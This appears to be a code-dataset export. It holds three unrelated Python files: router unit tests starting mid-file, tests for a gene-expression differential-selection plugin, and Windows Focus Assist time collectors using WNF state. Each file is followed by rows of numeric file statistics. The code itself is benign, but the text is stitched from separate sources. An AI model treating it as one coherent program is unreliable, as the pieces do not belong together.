        register = getattr(router, method.lower())  # router.get / .post / ...
        register('/', endware_1)
        register('/abc', endware_2)
        register('/abc/:val', endware_1)
        match = router._endware_path_match
        self.assertIsNotNone(match('/', method))
        for other in ('GET', 'POST', 'PUT', 'DELETE'):
            if other != method:
                self.assertIsNone(match('/', other))
        self.assertIsNotNone(match('/abc', method))
        self.assertIsNotNone(match('/abc/123', method))
        self.assertEqual(match('/', method)[2], endware_1)
        self.assertEqual(match('/abc', method)[2], endware_2)
        self.assertEqual(match('/abc/123', method)[2], endware_1)
        self.assertEqual(match('/abc/123', method)[0].params['val'], '123')
        self.assertEqual(match('/abc/123?val=123', method)[0].query['val'], '123')

    def test_get(self):
        self._check_single_method('GET')

    def test_post(self):
        self._check_single_method('POST')

    def test_put(self):
        self._check_single_method('PUT')

    def test_delete(self):
        self._check_single_method('DELETE')

    def test_route(self):
        """route() returns a chainable builder scoped to a path prefix."""
        router = Router()
        router.route('/abc') \
            .get('/', endware_1) \
            .get('/:val', endware_2)
        self.assertIsNotNone(router._endware_path_match('/abc', 'GET'))
        for other in ('PUT', 'POST', 'DELETE'):
            self.assertIsNone(router._endware_path_match('/abc', other))
        self.assertIsNotNone(router._endware_path_match('/abc/123', 'GET'))
        self.assertEqual(router._endware_path_match('/abc', 'GET')[2], endware_1)
        self.assertEqual(router._endware_path_match('/abc/123', 'GET')[2], endware_2)
        self.assertEqual(router._endware_path_match('/abc/123', 'GET')[0].params['val'], '123')
        self.assertEqual(router._endware_path_match('/abc/123?val=123', 'GET')[0].query['val'], '123')

    def test_use(self):
        """Middleware matches its own path and every sub-path beneath it."""
        router = Router()
        router.use('/abc', middleware_1)
        router.use('/abc/123', middleware_2)
        for path in ('/abc', '/abc/123', '/abc/123/def'):
            self.assertIsNotNone(router._middleware_path_match(path))
        self.assertEqual(len(router._middleware_path_match('/abc')), 1)
        self.assertEqual(len(router._middleware_path_match('/abc/123')), 2)
        self.assertEqual(len(router._middleware_path_match('/abc/123/def')), 2)
        self.assertEqual(router._middleware_path_match('/abc')[0][1], middleware_1)
        self.assertEqual(router._middleware_path_match('/abc/123')[0][1], middleware_1)
        self.assertEqual(router._middleware_path_match('/abc/123')[1][1], middleware_2)
        self.assertEqual(router._middleware_path_match('/abc?val=123')[0][0].query['val'], '123')
# Runs every TestCase in this module. NOTE(review): there is no
# `if __name__ == '__main__'` guard, so merely importing this module will
# also trigger the test run (and sys.exit) — confirm that is intended.
unittest.main()
| 42.634146
| 125
| 0.656608
| 857
| 6,992
| 5.058343
| 0.054842
| 0.143253
| 0.231373
| 0.299423
| 0.818685
| 0.818685
| 0.776932
| 0.736794
| 0.641292
| 0.60323
| 0
| 0.035751
| 0.163902
| 6,992
| 163
| 126
| 42.895706
| 0.705782
| 0.006293
| 0
| 0.347458
| 0
| 0
| 0.108984
| 0
| 0
| 0
| 0
| 0
| 0.59322
| 1
| 0.101695
| false
| 0.025424
| 0.016949
| 0
| 0.127119
| 0.008475
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e0cee71c71e40ad8df18ebe0fe574d810da392b4
| 4,579
|
py
|
Python
|
tests/analysis/test_differential_selection.py
|
tbj128/gene-expression-analyzer
|
a6c69577266f38b8978dfee513a67b929ad88d18
|
[
"MIT"
] | null | null | null |
tests/analysis/test_differential_selection.py
|
tbj128/gene-expression-analyzer
|
a6c69577266f38b8978dfee513a67b929ad88d18
|
[
"MIT"
] | null | null | null |
tests/analysis/test_differential_selection.py
|
tbj128/gene-expression-analyzer
|
a6c69577266f38b8978dfee513a67b929ad88d18
|
[
"MIT"
] | null | null | null |
import json
from gene.core.constants import SAMPLE_METADATA_FILENAME
from gene.analysis.differential_selection import DifferentialSelection
from tests.analysis.analysis_test_utils import AnalysisTestUtils
from gene.model.metadata import Metadata
import unittest
class TestDifferentialSelection(unittest.TestCase):
    """Integration tests for the DifferentialSelection analysis plugin.

    Both tests run the plugin against the "simple" fixture data set and
    compare the JSON output to a stored expected-output file; they differ
    only in the entry point used (plain analyse vs. analyse_with_ancom)
    and the extra custom attributes on the user request.
    """

    def _run_and_compare(self, use_ancom, extra_attrs, expected_filename):
        """Build the default request, run the plugin, and assert on the result.

        use_ancom -- when True call plugin.analyse_with_ancom, else plugin.analyse.
        extra_attrs -- additional custom attributes to set on the user request.
        expected_filename -- expected-output JSON file under SIMPLE_TEST_CASE_OUTPUT_ROOT.
        """
        user_request = AnalysisTestUtils.create_default_user_request()
        user_request.catvar = "Category"
        user_request.set_custom_attr("pvalthreshold", "0.01")
        user_request.set_custom_attr("pwVar1", "Control")
        user_request.set_custom_attr("pwVar2", "Disease")
        for attr, value in extra_attrs.items():
            user_request.set_custom_attr(attr, value)

        root = AnalysisTestUtils.SIMPLE_TEST_CASE_ROOT
        otu_table = AnalysisTestUtils.get_test_input_as_table(root)
        headers, sample_labels = AnalysisTestUtils.get_test_input_as_metadata(root)
        metadata_table = AnalysisTestUtils.get_test_input_as_table(root, SAMPLE_METADATA_FILENAME)
        metadata_col = AnalysisTestUtils.get_disease_metadata_values(root)
        taxonomic_map = AnalysisTestUtils.get_test_taxonomy(root)
        sample_ids_from_metadata = AnalysisTestUtils.get_sample_ids_from_metadata(root)

        # Pair each sample id with its metadata value; replaces the original
        # index-based while loop.
        sample_id_to_metadata = dict(zip(sample_ids_from_metadata, metadata_col))

        # NOTE(review): `metadata` is constructed but never passed to the
        # plugin; kept for parity with the original test setup.
        metadata = Metadata("test", "test", False)
        metadata.set_table(metadata_table)

        plugin = DifferentialSelection()
        analyse = plugin.analyse_with_ancom if use_ancom else plugin.analyse
        abundances = analyse(user_request, otu_table, headers, sample_labels,
                             sample_id_to_metadata, taxonomic_map)
        print(json.dumps(abundances))

        expected_output = AnalysisTestUtils.get_expected_output(
            AnalysisTestUtils.SIMPLE_TEST_CASE_OUTPUT_ROOT, expected_filename)
        comparison_output = AnalysisTestUtils.compare_two_objects(expected_output, abundances)
        if not comparison_output:
            print("Expected: ")
            print(expected_output)
            print("Actual: ")
            print(abundances)
        self.assertTrue(comparison_output)

    def test_simple_differential_selection(self):
        """t-test based differential selection against stored expected output."""
        self._run_and_compare(False, {"type": "ttest"},
                              "differential_selection_control_disease.json")

    def test_simple_differential_selection_with_ancom(self):
        """ANCOM based differential selection against stored expected output."""
        self._run_and_compare(True, {},
                              "differential_selection_with_ancom_control_disease.json")
if __name__ == '__main__':
    # Allow running this test module directly with `python <file>`.
    unittest.main()
| 52.034091
| 133
| 0.733566
| 499
| 4,579
| 6.266533
| 0.168337
| 0.052766
| 0.120883
| 0.138791
| 0.893508
| 0.864087
| 0.864087
| 0.864087
| 0.864087
| 0.864087
| 0
| 0.003805
| 0.196549
| 4,579
| 88
| 134
| 52.034091
| 0.846154
| 0
| 0
| 0.783784
| 0
| 0
| 0.058515
| 0.021179
| 0
| 0
| 0
| 0
| 0.027027
| 1
| 0.027027
| false
| 0
| 0.081081
| 0
| 0.121622
| 0.135135
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e0dd323410177a7748b63a33a52d02ac91453b73
| 3,452
|
py
|
Python
|
flowd/metrics/wnf_collectors.py
|
henrykp/fs_collect
|
ee06e76e974ab9e1041b8c1cff81956c11a28a35
|
[
"MIT"
] | null | null | null |
flowd/metrics/wnf_collectors.py
|
henrykp/fs_collect
|
ee06e76e974ab9e1041b8c1cff81956c11a28a35
|
[
"MIT"
] | null | null | null |
flowd/metrics/wnf_collectors.py
|
henrykp/fs_collect
|
ee06e76e974ab9e1041b8c1cff81956c11a28a35
|
[
"MIT"
] | null | null | null |
import logging
import threading
import time
from flowd.utils import wnf
from flowd.metrics import BaseCollector
# Values compared against the WNF_SHEL_QUIETHOURS_ACTIVE_PROFILE_CHANGED
# state read below — presumably 1 = Focus Assist "priority only" profile,
# 2 = "alarms/alerts only" profile; TODO confirm against Windows docs.
PRIORITY_MODE = 1
ALERT_MODE = 2
class _QuietHoursModeCollector(BaseCollector):
    """Shared base: accumulate seconds spent in one Windows quiet-hours mode.

    The original file contained two byte-for-byte duplicate collector classes
    differing only in the mode constant and log label; this base holds the
    common logic. Subclasses set ``metric_name``, ``_mode`` (WNF state value
    to match) and ``_mode_label`` (used in the debug log line).
    """

    _mode = None        # WNF state value identifying the mode (set by subclass)
    _mode_label = ''    # human-readable mode name for the debug log

    def __init__(self) -> None:
        self.time_in_mode = 0.0  # accumulated seconds spent in the mode
        self.is_run = True       # polling loop keeps running while True

    def stop_collect(self) -> None:
        """Ask the polling loop in start_collect() to exit."""
        self.is_run = False

    def start_collect(self) -> None:
        """Poll the WNF quiet-hours state once per second until stopped.

        Each iteration adds the elapsed wall-clock time since the previous
        check when (and only when) the state matches ``_mode``.
        """
        start_time = time.time()
        while self.is_run:
            if wnf.do_read(wnf.format_state_name("WNF_SHEL_QUIETHOURS_ACTIVE_PROFILE_CHANGED")) == self._mode:
                self.time_in_mode += time.time() - start_time
            start_time = time.time()
            time.sleep(1)

    def get_current_state(self) -> tuple:
        """Return (metric_name, whole seconds spent in the mode so far)."""
        t = int(round(self.time_in_mode))
        logging.debug(f'Time in {self._mode_label} mode: {t}')
        return self.metric_name, t

    def cleanup(self) -> None:
        """Reset the collector so it can be started again."""
        self.time_in_mode = 0
        self.is_run = True


class PriorityModeCollector(_QuietHoursModeCollector):
    """Seconds spent in the quiet-hours priority profile."""
    metric_name = "Time in Priority Mode (seconds)"
    _mode = PRIORITY_MODE
    _mode_label = 'priority'


class AlertModeCollector(_QuietHoursModeCollector):
    """Seconds spent in the quiet-hours alerts-only profile."""
    metric_name = "Time in Alerts Only Mode (seconds)"
    _mode = ALERT_MODE
    _mode_label = 'alert'
if __name__ == '__main__':
    # Example of usage: drive each collector through a full
    # collect / report / cleanup cycle and verify cleanup() zeroes it.
    logging.basicConfig(level=logging.DEBUG, format="%(levelname)-8s %(message)s")

    def demo(collector, duration):
        # Run *collector* in a background thread for *duration* seconds,
        # log the collected metric, then verify cleanup() resets it to 0.
        worker = threading.Thread(target=collector.start_collect)
        logging.debug("Main : create and start thread")
        worker.start()
        logging.debug("Main : wait for the thread to finish")
        time.sleep(duration)
        logging.debug("Main : stop collect")
        collector.stop_collect()
        # Join so the polling loop has fully exited before we read state;
        # otherwise get_current_state() races with the last iteration.
        worker.join()
        metric_name, value = collector.get_current_state()
        logging.info(f'metric_name {metric_name}')
        logging.info(f'value {value}')
        logging.debug("Main : cleanup")
        collector.cleanup()
        metric_name, value = collector.get_current_state()
        logging.info(f'metric_name {metric_name}')
        logging.info(f'value {value}')
        assert value == 0

    demo(PriorityModeCollector(), 10)
    demo(AlertModeCollector(), 30)
| 30.821429
| 113
| 0.651506
| 453
| 3,452
| 4.739514
| 0.187638
| 0.074523
| 0.037261
| 0.052166
| 0.868188
| 0.825803
| 0.825803
| 0.82068
| 0.82068
| 0.82068
| 0
| 0.00679
| 0.232039
| 3,452
| 111
| 114
| 31.099099
| 0.803093
| 0.004635
| 0
| 0.767442
| 0
| 0
| 0.184624
| 0.024461
| 0
| 0
| 0
| 0
| 0.023256
| 1
| 0.116279
| false
| 0
| 0.05814
| 0
| 0.244186
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.